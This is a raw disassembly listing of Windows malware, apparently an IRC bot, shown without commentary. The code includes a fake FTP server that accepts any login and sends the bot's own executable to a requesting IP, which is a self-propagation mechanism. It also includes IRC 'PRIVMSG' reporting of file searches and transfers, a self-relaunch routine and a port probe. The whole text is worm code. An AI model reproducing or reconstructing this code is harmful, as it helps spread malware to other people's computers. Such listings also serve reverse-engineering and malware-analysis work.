pop ecx
xor eax, eax
lea edi, [ebp+var_54]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_158]
xor edi, edi
push eax
mov [ebp+var_48], (offset asc_41FA74+2)
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_41F040 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_41F030 ; CreateProcessA
test eax, eax
jz short loc_402854
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:dword_41F034
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_402854: ; CODE XREF: sub_402795+A9�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_432FEC
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_41F02C ; ExitProcess
int 3 ; Trap to Debugger
sub_402795 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402875 proc near ; CODE XREF: sub_4028A8+11C�p
; sub_4028A8+145�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
sub edx, [ebp+arg_C]
push ebx
push esi
xor eax, eax
test edx, edx
push edi
jle short loc_40289D
loc_402887: ; CODE XREF: sub_402875+26�j
mov esi, [ebp+arg_0]
mov ecx, [ebp+arg_C]
mov edi, [ebp+arg_8]
add esi, eax
xor ebx, ebx
repe cmpsb
jz short loc_4028A4
inc eax
cmp eax, edx
jl short loc_402887
loc_40289D: ; CODE XREF: sub_402875+10�j
xor al, al
loc_40289F: ; CODE XREF: sub_402875+31�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4028A4: ; CODE XREF: sub_402875+21�j
mov al, 1
jmp short loc_40289F
sub_402875 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A8 proc near ; CODE XREF: .text:00412172�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_412DD0
mov eax, [ebp+arg_4]
dec eax
jz short loc_4028E5
dec eax
jz short loc_4028C3
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4028C3: ; CODE XREF: sub_4028A8+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_433514
push eax
call sub_4015FE
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_4028E5: ; CODE XREF: sub_4028A8+11�j
push ebx
push esi
push 6
push 1
push 2
call dword_4334A0
mov esi, eax
or ebx, 0FFFFFFFFh
xor eax, eax
cmp esi, ebx
mov [ebp+arg_4], esi
jz loc_402A0A
push edi
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 87h
mov [ebp+var_10], 2
call dword_4335EC
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_406B1D
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push esi
call dword_433458
cmp eax, ebx
jz short loc_402954
xor edi, edi
push edi
push 48h
push offset dword_42A368
push esi
call dword_433534
cmp eax, ebx
jnz short loc_40295B
loc_402954: ; CODE XREF: sub_4028A8+95�j
; sub_4028A8+CC�j ...
xor esi, esi
jmp loc_4029FE
; ---------------------------------------------------------------------------
loc_40295B: ; CODE XREF: sub_4028A8+AA�j
push edi
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_433414
cmp eax, ebx
jz short loc_402954
cmp [ebp+var_200E], 0Ch
jnz short loc_402954
push edi
push 18h
push offset dword_42A3B4
push [ebp+arg_4]
call dword_433534
cmp eax, ebx
jz short loc_402954
push edi
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_433414
mov esi, eax
cmp esi, ebx
jz short loc_402954
cmp [ebp+var_200E], 2
jnz short loc_402954
push 10h
push offset loc_42A3D0
lea eax, [ebp+var_2010]
push esi
push eax
call sub_402875
add esp, 10h
test al, al
jz short loc_4029DE
xor eax, eax
cmp esi, 12Ch
setnl al
inc eax
jmp short loc_4029FC
; ---------------------------------------------------------------------------
loc_4029DE: ; CODE XREF: sub_4028A8+126�j
push 10h
push offset dword_42A3E4
lea eax, [ebp+var_2010]
push esi
push eax
call sub_402875
add esp, 10h
neg al
sbb eax, eax
and eax, 3
loc_4029FC: ; CODE XREF: sub_4028A8+134�j
mov esi, eax
loc_4029FE: ; CODE XREF: sub_4028A8+AE�j
push [ebp+arg_4]
call dword_4335AC
mov eax, esi
pop edi
loc_402A0A: ; CODE XREF: sub_4028A8+57�j
pop esi
pop ebx
leave
retn
sub_4028A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A0E proc near ; CODE XREF: sub_402B1D+4A2�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_41F1EC ; WSAStartup
push 0
push 1
push 2
call ds:dword_41F1F0 ; socket
push [ebp+arg_0]
mov dword_432FF0, eax
mov [ebp+var_10], 2
call ds:dword_41F1F4 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_41F204 ; htons
mov [ebp+var_E], ax
push 10h
lea eax, [ebp+var_10]
push eax
push dword_432FF0
call ds:dword_41F1F8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_402A86
push dword_432FF0
call ds:dword_41F1FC ; closesocket
call ds:dword_41F200 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_402A86: ; CODE XREF: sub_402A0E+60�j
xor eax, eax
inc eax
leave
retn
sub_402A0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A8B proc near ; CODE XREF: sub_402B1D+4AE�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
push 104h
lea eax, [ebp+var_104]
push eax
push 0
call ds:dword_41F010 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_41F968
push eax
call sub_413393
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_402AF8
jmp short loc_402B1A
; ---------------------------------------------------------------------------
loc_402AC4: ; CODE XREF: sub_402A8B+72�j
push 400h
lea eax, [ebp+var_504]
push 1
push eax
call sub_41313E
add esp, 10h
push 0
push eax
lea eax, [ebp+var_504]
push eax
push dword_432FF0
call ds:dword_41F1E8 ; send
push 0Ah
call ds:dword_41F000 ; Sleep
loc_402AF8: ; CODE XREF: sub_402A8B+35�j
test byte ptr [esi+0Ch], 10h
push esi
jz short loc_402AC4
call sub_412F93
pop ecx
push dword_432FF0
call ds:dword_41F1FC ; closesocket
call ds:dword_41F200 ; WSACleanup
xor eax, eax
inc eax
loc_402B1A: ; CODE XREF: sub_402A8B+37�j
pop esi
leave
retn
sub_402A8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_402B1D proc near ; DATA XREF: sub_401141+254�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A6Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
xor ebx, ebx
inc ebx
mov ecx, 0A9h
lea edi, [ebp+74h+var_6DC]
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+74h+var_A6C]
push eax
xor esi, esi
push 101h
mov [ebp+74h+var_18], ebx
mov [ebp+74h+var_1C], ebx
mov [ebp+74h+var_228], esi
mov [ebp+74h+var_438], esi
call ds:dword_41F1EC ; WSAStartup
push esi
call sub_413820
push eax
call sub_412D64
mov eax, [ebp+74h+arg_0]
mov eax, [eax+214h]
pop ecx
pop ecx
push esi
push ebx
push 2
mov dword_432FF4, eax
call ds:dword_41F1F0 ; socket
mov ebx, eax
push 4
lea eax, [ebp+74h+var_18]
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+74h+var_8], ebx
call ds:dword_41F1C8 ; setsockopt
lea eax, [ebp+74h+var_1C]
push eax
push 8004667Eh
push ebx
call ds:dword_41F1CC ; ioctlsocket
xor eax, eax
mov ax, word ptr dword_432FF4
mov [ebp+74h+var_38], 2
mov [ebp+74h+var_34], esi
push eax
call ds:dword_41F204 ; htons
mov [ebp+74h+var_36], ax
push 10h
lea eax, [ebp+74h+var_38]
push eax
push ebx
call ds:dword_41F1D0 ; bind
test eax, eax
jl loc_4030B7
push 0Ah
push ebx
call ds:dword_41F1D4 ; listen
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
mov [ebp+74h+var_224], ebx
mov [ebp+74h+var_4], ebx
push eax
inc ebx
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
mov [ebp+74h+var_228], 1
push ebx
rep movsd
call ds:dword_41F1D8 ; select
cmp eax, 0FFFFFFFFh
jz loc_4030B7
mov ebx, ds:dword_41F1E8
loc_402C3C: ; CODE XREF: sub_402B1D+594�j
xor esi, esi
cmp [ebp+74h+var_4], esi
mov [ebp+74h+arg_0], esi
jl loc_403086
loc_402C4A: ; CODE XREF: sub_402B1D+563�j
push 19h
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+74h+var_29C]
rep stosd
pop ecx
lea edi, [ebp+74h+var_AC]
rep stosd
lea eax, [ebp+74h+var_438]
push eax
push esi
call sub_41E8A0 ; __WSAFDIsSet
test eax, eax
jz loc_403079
cmp esi, [ebp+74h+var_8]
jnz short loc_402CE4
push 10h
pop edi
lea eax, [ebp+74h+var_24]
push eax
lea eax, [ebp+74h+var_238]
push eax
push [ebp+74h+var_8]
mov [ebp+74h+var_24], edi
call ds:dword_41F1E0 ; accept
cmp eax, 0FFFFFFFFh
jz loc_403079
mov edx, [ebp+74h+var_228]
xor ecx, ecx
test edx, edx
jbe short loc_402CB6
loc_402CA8: ; CODE XREF: sub_402B1D+197�j
cmp [ebp+ecx*4+74h+var_224], eax
jz short loc_402CB6
inc ecx
cmp ecx, edx
jb short loc_402CA8
loc_402CB6: ; CODE XREF: sub_402B1D+189�j
; sub_402B1D+192�j
cmp ecx, edx
jnz short loc_402CCC
cmp edx, 40h
jnb short loc_402CCC
mov [ebp+ecx*4+74h+var_224], eax
inc [ebp+74h+var_228]
loc_402CCC: ; CODE XREF: sub_402B1D+19B�j
; sub_402B1D+1A0�j
cmp eax, [ebp+74h+var_4]
jle short loc_402CD4
mov [ebp+74h+var_4], eax
loc_402CD4: ; CODE XREF: sub_402B1D+1B2�j
push 0
push edi
push offset a220Winftpd1_2 ; "220 WinFtpd 1.2\n"
push eax
call ebx ; send
jmp loc_403079
; ---------------------------------------------------------------------------
loc_402CE4: ; CODE XREF: sub_402B1D+15A�j
push 0
push 64h
lea eax, [ebp+74h+var_29C]
push eax
push esi
call ds:dword_41F1E4 ; recv
test eax, eax
jg short loc_402D42
mov ecx, [ebp+74h+var_228]
xor eax, eax
test ecx, ecx
jbe short loc_402D36
loc_402D06: ; CODE XREF: sub_402B1D+1F5�j
cmp [ebp+eax*4+74h+var_224], esi
jz short loc_402D2B
inc eax
cmp eax, ecx
jb short loc_402D06
jmp short loc_402D36
; ---------------------------------------------------------------------------
loc_402D16: ; CODE XREF: sub_402B1D+211�j
mov ecx, [ebp+eax*4+74h+var_220]
mov [ebp+eax*4+74h+var_224], ecx
mov ecx, [ebp+74h+var_228]
inc eax
loc_402D2B: ; CODE XREF: sub_402B1D+1F0�j
dec ecx
cmp eax, ecx
jb short loc_402D16
dec [ebp+74h+var_228]
loc_402D36: ; CODE XREF: sub_402B1D+1E7�j
; sub_402B1D+1F7�j
push esi
call ds:dword_41F1FC ; closesocket
jmp loc_403079
; ---------------------------------------------------------------------------
loc_402D42: ; CODE XREF: sub_402B1D+1DB�j
lea eax, [ebp+74h+var_334]
push eax
lea eax, [ebp+74h+var_AC]
push eax
lea eax, [ebp+74h+var_29C]
push offset aSS_0 ; "%s %s"
push eax
call sub_412D93
add esp, 10h
push 5
pop edx
mov edi, offset aUser_0 ; "USER"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402D81
push eax
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402D81: ; CODE XREF: sub_402B1D+255�j
mov edi, offset aPass ; "PASS"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402D9E
push eax
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402D9E: ; CODE XREF: sub_402B1D+272�j
mov edi, offset aSyst ; "SYST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402DBB
push eax
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DBB: ; CODE XREF: sub_402B1D+28F�j
mov edi, offset aRest ; "REST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_402DD8
push eax
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DD8: ; CODE XREF: sub_402B1D+2AC�j
push 4
mov edi, offset off_41FE14
lea esi, [ebp+74h+var_AC]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402DF6
push eax
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402DF6: ; CODE XREF: sub_402B1D+2CA�j
mov eax, offset aType ; "TYPE"
mov ecx, edx
mov edi, eax
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz short loc_402E29
push 2
mov edi, offset aA_0 ; "A"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_402E29
push edx
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402E29: ; CODE XREF: sub_402B1D+2E9�j
; sub_402B1D+2FD�j
mov edi, eax
push 5
pop eax
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_402E5A
push 2
mov edi, offset aI ; "I"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_402E5A
push edx
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402E5A: ; CODE XREF: sub_402B1D+31A�j
; sub_402B1D+32E�j
mov edi, offset aPasv ; "PASV"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_402E99
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+var_124]
rep movsd
lea eax, [ebp+74h+var_124]
movsw
lea edx, [eax+1]
loc_402E85: ; CODE XREF: sub_402B1D+36D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402E85
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_124]
jmp short loc_402ECD
; ---------------------------------------------------------------------------
loc_402E99: ; CODE XREF: sub_402B1D+34B�j
mov edi, offset aList ; "LIST"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
mov ecx, eax
jnz short loc_402ED3
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C4]
rep movsd
movsw
lea eax, [ebp+74h+var_C4]
movsb
lea edx, [eax+1]
loc_402EBE: ; CODE XREF: sub_402B1D+3A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402EBE
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_C4]
loc_402ECD: ; CODE XREF: sub_402B1D+37A�j
push eax
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402ED3: ; CODE XREF: sub_402B1D+38C�j
mov edi, offset aPort ; "PORT"
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz loc_402F97
lea eax, [ebp+74h+var_2D0]
push eax
lea eax, [ebp+74h+var_F8]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_412D93
lea eax, [ebp+74h+var_F8]
push eax
call sub_412F42
mov esi, eax
lea eax, [ebp+74h+var_2D0]
push eax
call sub_412F42
push 0Ch
mov edx, eax
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_F8]
rep stosd
push edx
push esi
stosw
lea eax, [ebp+74h+var_F8]
push offset aXX ; "%x%x\n"
push eax
call sub_412BB5
push 10h
lea eax, [ebp+74h+var_F8]
push 0
push eax
call sub_413809
mov [ebp+74h+var_10], eax
add esp, 44h
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_412BB5
add esp, 18h
push 0
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_403064
; ---------------------------------------------------------------------------
loc_402F97: ; CODE XREF: sub_402B1D+3C2�j
mov edi, offset aRetr ; "RETR"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz loc_40304C
push edx
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+74h+arg_0]
call ebx ; send
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_48]
push eax
call sub_402A0E
cmp eax, 1
pop ecx
pop ecx
jnz short loc_403041
call sub_402A8B
cmp eax, 1
jnz loc_403069
xor esi, esi
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+74h+arg_0]
call ebx ; send
lea eax, [ebp+74h+var_6D8]
push eax
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+74h+var_440], esi
jnz short loc_403032
push esi
push [ebp+74h+var_444]
lea eax, [ebp+74h+var_8DC]
push eax
lea eax, [ebp+74h+var_4C4]
push eax
push [ebp+74h+var_6DC]
call sub_4045DD
add esp, 14h
loc_403032: ; CODE XREF: sub_402B1D+4F0�j
lea eax, [ebp+74h+var_8DC]
push eax
call sub_401C33
pop ecx
jmp short loc_403069
; ---------------------------------------------------------------------------
loc_403041: ; CODE XREF: sub_402B1D+4AC�j
push 0
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_403064
; ---------------------------------------------------------------------------
loc_40304C: ; CODE XREF: sub_402B1D+488�j
mov ecx, eax
mov edi, offset aQuit ; "QUIT"
lea esi, [ebp+74h+var_AC]
xor eax, eax
repe cmpsb
jnz short loc_403069
push eax
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_403064: ; CODE XREF: sub_402B1D+25F�j
; sub_402B1D+27C�j ...
push [ebp+74h+arg_0]
call ebx ; send
loc_403069: ; CODE XREF: sub_402B1D+4B6�j
; sub_402B1D+522�j ...
mov esi, [ebp+74h+arg_0]
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_29C]
rep stosd
loc_403079: ; CODE XREF: sub_402B1D+151�j
; sub_402B1D+179�j ...
inc esi
cmp esi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], esi
jle loc_402C4A
loc_403086: ; CODE XREF: sub_402B1D+127�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
push eax
rep movsd
call ds:dword_41F1D8 ; select
cmp eax, 0FFFFFFFFh
jnz loc_402C3C
loc_4030B7: ; CODE XREF: sub_402B1D+C9�j
; sub_402B1D+113�j
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 74h
leave
retn 4
sub_402B1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030C4 proc near ; CODE XREF: sub_4039DE+149�p
; sub_4078FA+355D�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
push 41h
pop ecx
xor eax, eax
lea edi, [ebp+var_598]
rep stosd
mov edi, [ebp+arg_0]
xor ebx, ebx
push offset asc_420328 ; "\n"
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_413859
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
jz short loc_40311D
push edi
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 14h
jmp loc_40323A
; ---------------------------------------------------------------------------
loc_40311D: ; CODE XREF: sub_4030C4+34�j
cmp [ebp+arg_C], ebx
jz loc_40321F
mov eax, edi
lea ecx, [eax+1]
loc_40312B: ; CODE XREF: sub_4030C4+6C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40312B
push edi
sub eax, ecx
and [eax+edi-1], dl
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_40315C: ; CODE XREF: sub_4030C4+9D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40315C
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_403196: ; CODE XREF: sub_4030C4+D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_403196
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
mov eax, edi
lea ecx, [eax+1]
loc_4031B6: ; CODE XREF: sub_4030C4+F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4031B6
push 3Ch
push 96h
push 0E6h
sub eax, ecx
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 18h
lea ecx, [eax+1]
loc_4031ED: ; CODE XREF: sub_4030C4+12E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4031ED
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 0Ch
jmp short loc_40323A
; ---------------------------------------------------------------------------
loc_40321F: ; CODE XREF: sub_4030C4+5C�j
push edi
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
add esp, 10h
loc_40323A: ; CODE XREF: sub_4030C4+54�j
; sub_4030C4+159�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_403243: ; CODE XREF: sub_4030C4+184�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403243
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
mov eax, [ebp+arg_C]
cmp eax, ebx
jz loc_4032ED
lea edx, [eax+1]
loc_40326C: ; CODE XREF: sub_4030C4+1AD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40326C
sub eax, edx
cmp eax, 2
jbe short loc_4032ED
mov eax, [ebp+arg_C]
lea edx, [eax+1]
loc_403280: ; CODE XREF: sub_4030C4+1C1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403280
sub eax, edx
add eax, 0FFFFFFFDh
cmp eax, ebx
jz short loc_40329C
loc_403290: ; CODE XREF: sub_4030C4+1D6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40329C
dec eax
jnz short loc_403290
loc_40329C: ; CODE XREF: sub_4030C4+1CA�j
; sub_4030C4+1D3�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_412C40
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_24C]
add esp, 1Ch
lea ecx, [eax+1]
loc_4032D2: ; CODE XREF: sub_4030C4+213�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4032D2
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_433534
loc_4032ED: ; CODE XREF: sub_4030C4+19F�j
; sub_4030C4+1B4�j
lea eax, [ebp+var_38C]
push eax
push edi
call ds:dword_41F054 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call ds:dword_41F050 ; FindNextFileA
test eax, eax
jz loc_40371A
mov ebx, 1FFh
loc_403319: ; CODE XREF: sub_4030C4+650�j
cmp [ebp+var_38C], 0
jz loc_403702
push 3
mov edi, offset a__ ; ".."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_403702
push 2
mov edi, offset a__0 ; "."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_403702
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call ds:dword_41F04C ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call ds:dword_41F048 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm ; "PM"
ja loc_403417
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_403390: ; CODE XREF: sub_4030C4+359�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_412BB5
add esp, 20h
xor edi, edi
test byte ptr [ebp+var_38C], 10h
jz loc_403566
inc [ebp+var_8]
cmp [ebp+arg_8], edi
jz short loc_403422
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_412E0D
lea eax, [ebp+var_4C]
push eax
